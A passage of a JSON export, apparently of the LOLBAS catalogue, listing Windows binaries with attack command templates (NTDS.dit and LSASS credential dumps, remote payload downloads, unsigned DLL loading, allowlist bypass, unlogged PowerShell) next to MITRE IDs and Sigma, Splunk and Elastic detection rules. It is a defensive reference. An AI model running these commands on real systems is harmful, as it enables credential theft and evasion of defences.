installation","aliases":[]},{"id":"lolbas:nmcap-exe:0","toolId":"lolbas:nmcap-exe","toolName":"Nmcap.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"nmcap.exe /network * /capture /file {PATH_ABSOLUTE:.cap}","description":"Start capture on all network adapters and save to specified .cap (circular) file.\nOptionally, one can add:\n- `/TerminateWhen /TimeAfter 30 seconds` to auto-terminate after a relative times (e.g. 30 seconds);\n- `/TerminateWhen /Time 04:52:00 AM 9/17/2025` to auto-terminate after a specific date/time;\n- `/TerminateWhen /KeyPress x` to terminate when a specific key is pressed.\n","usecase":"Capture network traffic on windows to collect sensitive data.","mitre":["T1040"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft Network Monitor 3\\nmcap.exe","C:\\Program Files (x86)\\Microsoft Network Monitor 3\\nmcap.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/network-monitor-3","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Nmcap/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ntdsutil-exe:0","toolId":"lolbas:ntdsutil-exe","toolName":"ntdsutil.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"ntdsutil.exe \"ac i ntds\" \"ifm\" \"create full c:\\\" q q","description":"Dump NTDS.dit into folder","usecase":"Dumping of Active Directory NTDS.dit database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\ntdsutil.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"ntdsutil.exe with command line including \"ifm\""}],"references":["https://adsecurity.org/?p=2398#CreateIFM","https://lolbas-project.github.io/lolbas/OtherMSBinaries/ntdsutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ntsd-exe:0","toolId":"lolbas:ntsd-exe","toolName":"Ntsd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ntsd.exe -g {CMD}","description":"Launches command through the debugging process; optionally add `-G` to exit the debugger automatically.","usecase":"Executes an executable under a trusted microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\ntsd.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://strontic.github.io/xcyclopedia/library/ntsd.exe-629EA12D527237B9CD945AC44C2DE80D.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntsd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:openconsole-exe:0","toolId":"lolbas:openconsole-exe","toolName":"OpenConsole.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"OpenConsole.exe {PATH:.exe}","description":"Execute specified process with OpenConsole.exe as parent process","usecase":"Use OpenConsole.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\\OpenConsole.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"OpenConsole.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml"}],"references":["https://twitter.com/nas_bench/status/1537563834478645252","https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:outlook-exe:0","toolId":"lolbas:outlook-exe","toolName":"Outlook.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Outlook.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Outlook/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:pixtool-exe:0","toolId":"lolbas:pixtool-exe","toolName":"Pixtool.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pixtool.exe launch {PATH_ABSOLUTE:.exe}","description":"Launches an executable via PIX command-line utility.","usecase":"Executes an executable under a trusted, Microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft PIX\\pixtool.exe","C:\\Program Files (x86)\\Microsoft PIX\\pixtool.exe"],"toolType":"OtherMSBinary","references":["https://devblogs.microsoft.com/pix/pixtool/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Pixtool/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:powerpnt-exe:0","toolId":"lolbas:powerpnt-exe","toolName":"Powerpnt.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Powerpnt.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:procdump-exe:0","toolId":"lolbas:procdump-exe","toolName":"Procdump.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"procdump.exe -md {PATH:.dll} explorer.exe","description":"Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.","usecase":"Performs execution of unsigned DLL.","mitre":["T1202"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Process creation with given '-md' parameter"},{"type":"IOC","value":"Anomalous child processes of procdump"},{"type":"IOC","value":"Unsigned DLL load via procdump.exe or procdump64.exe"}],"references":["https://twitter.com/ajpc500/status/1448588362382778372?s=20","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["Procdump64.exe"]},{"id":"lolbas:procdump-exe:1","toolId":"lolbas:procdump-exe","toolName":"Procdump.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"procdump.exe -md {PATH:.dll} foobar","description":"Loads the specified DLL where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.","usecase":"Performs execution of unsigned DLL.","mitre":["T1202"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Process creation with given '-md' parameter"},{"type":"IOC","value":"Anomalous child processes of procdump"},{"type":"IOC","value":"Unsigned DLL load via procdump.exe or procdump64.exe"}],"references":["https://twitter.com/ajpc500/status/1448588362382778372?s=20","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["Procdump64.exe"]},{"id":"lolbas:protocolhandler-exe:0","toolId":"lolbas:protocolhandler-exe","toolName":"ProtocolHandler.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ProtocolHandler.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rcsi-exe:0","toolId":"lolbas:rcsi-exe","toolName":"rcsi.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rcsi.exe {PATH:.csx}","description":"Use embedded C# within the csx script to execute the code.","usecase":"Local execution of arbitrary C# code stored in local CSX file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"}],"references":["https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rcsi-exe:1","toolId":"lolbas:rcsi-exe","toolName":"rcsi.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rcsi.exe {PATH:.csx}","description":"Use embedded C# within the csx script to execute the code.","usecase":"Local execution of arbitrary C# code stored in local CSX file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"}],"references":["https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:remote-exe:0","toolId":"lolbas:remote-exe","toolName":"Remote.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Remote.exe /s {PATH:.exe} anythinghere","description":"Spawns specified executable as a child process of remote.exe","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"remote.exe process spawns"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:remote-exe:1","toolId":"lolbas:remote-exe","toolName":"Remote.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Remote.exe /s {PATH:.exe} anythinghere","description":"Spawns specified executable as a child process of remote.exe","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"remote.exe process spawns"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:remote-exe:2","toolId":"lolbas:remote-exe","toolName":"Remote.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Remote.exe /s {PATH_SMB:.exe} anythinghere","description":"Run a remote file","usecase":"Executing a remote binary without saving file to disk","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"remote.exe process spawns"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sqldumper-exe:0","toolId":"lolbas:sqldumper-exe","toolName":"Sqldumper.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"sqldumper.exe 464 0 0x0110","description":"Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).","usecase":"Dump process using PID.","mitre":["T1003"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/countuponsec/status/910969424215232518","https://twitter.com/countuponsec/status/910977826853068800","https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sqldumper-exe:1","toolId":"lolbas:sqldumper-exe","toolName":"Sqldumper.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"sqldumper.exe 540 0 0x01100:40","description":"0x01100:40 flag will create a Mimikatz compatible dump file.","usecase":"Dump LSASS.exe to Mimikatz compatible dump using PID.","mitre":["T1003.001"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/countuponsec/status/910969424215232518","https://twitter.com/countuponsec/status/910977826853068800","https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sqlps-exe:0","toolId":"lolbas:sqlps-exe","toolName":"Sqlps.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Sqlps.exe -noprofile","description":"Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.","usecase":"Execute PowerShell commands without ScriptBlock logging.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/execution_suspicious_powershell_imgload.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md"}],"references":["https://twitter.com/ManuelBerrueta/status/1527289261350760455","https://twitter.com/bryon_/status/975835709587075072","https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sqltoolsps-exe:0","toolId":"lolbas:sqltoolsps-exe","toolName":"SQLToolsPS.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe}","description":"Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.","usecase":"Execute PowerShell command.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md"}],"references":["https://twitter.com/pabraeken/status/993298228840992768","https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017","https://lolbas-project.github.io/lolbas/OtherMSBinaries/SQLToolsPS/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:squirrel-exe:0","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"squirrel.exe --download {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file and download the nuget package.","usecase":"Download binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:squirrel-exe:1","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"squirrel.exe --update {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute 